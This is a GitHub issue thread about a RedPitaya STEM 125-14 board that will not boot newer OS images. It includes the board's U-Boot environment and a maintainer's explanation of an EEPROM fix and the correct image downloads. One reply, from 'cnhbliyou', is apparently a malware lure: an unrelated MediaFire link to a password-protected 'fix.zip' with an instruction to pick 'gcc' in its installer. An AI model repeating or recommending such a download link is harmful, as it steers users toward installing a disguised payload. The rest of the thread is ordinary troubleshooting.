RedPitaya/RedPitaya #303: Board not updating correctly

Trent-Ralph, 2024-08-28:
Hi, I'm having a similar issue to #250 where I'm not able to boot anything newer than stable 2.04-35. What is also strange once booted and connected the UI says I have version 2.00-35 not the 2.04-35 I flashed so I get the yellow warning and when I try to use the updater I get the warning that it's not supported by the current Linux environment. 

I have tried to flash both beta 2.05 and 2.04 but I get stuck with a solid green light. Running fw_printenv gives the following but the hw_rev appears suitable unlike #250 . 

```
baudrate=115200                                                                                                                                                 
bitstream_image=system.bit.bin                                                                                                                                  
bootcmd=run $modeboot                                                                                                                                           
bootdelay=3                                                                                                                                                     
devicetree_image=devicetree.dtb                                                                                                                                 
devicetree_size=0x20000                                                                                                                                         
ethaddr=00:26:32:F0:8E:6F                                                                                                                                       
fdt_high=0x20000000                                                                                                                                             
hw_rev=STEM_125-14_v1.0                                                                                                                                         
initrd_high=0x20000000                                                                                                                                          
ipaddr=10.10.70.102                                                                                                                                             
kernel_image=uImage                                                                                                                                             
kernel_size=0x500000                                                                                                                                            
loadbit_addr=0x100000                                                                                                                                           
nav_code=4702                                                                                                                                                   
prod_date=12/22/13                                                                                                                                              
ramdisk_image=uramdisk.image.gz                                                                                                                                 
ramdisk_size=0x5E0000                                                                                                                                           
sdboot=echo Copying Linux from SD to RAM... && mmcinfo && fatload mmc 0 0x3000000 ${kernel_image} && fatload mmc 0 0x2A00000 ${devicetree_image} && fatload mmc 
0 0x2000000 ${ramdisk_image} && bootm 0x3000000 0x2000000 0x2A00000                                                                                             
serial=162400000                                                                                                                                                
serverip=10.10.70.101  
```

Any tips on how I can get my board to update ?

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

b-swat, 2024-08-28:
In version up to 35 there was a problem with reading eeprom at the kernel boot stage, in 35 I fixed it. That's why you can't run old images of version 2.00
I also fixed the version marking scripts in version 37. In older versions, including 35, the OS version is 2.00.

Did you use this version of the image?
https://downloads.redpitaya.com/downloads/Unify/

These image versions do not contain the ecosystem and will not load:
https://downloads.redpitaya.com/downloads/LinuxOS/

Trent-Ralph, 2024-09-17:
Thanks for the quick reply and sorry it took so long to get back to you. This appears to be the problem. Also updating to the beta image (2.05-37) fixed another problem we were having with multiple readings of the DMA buffer.

closed 2024-09-17 by Trent-Ralph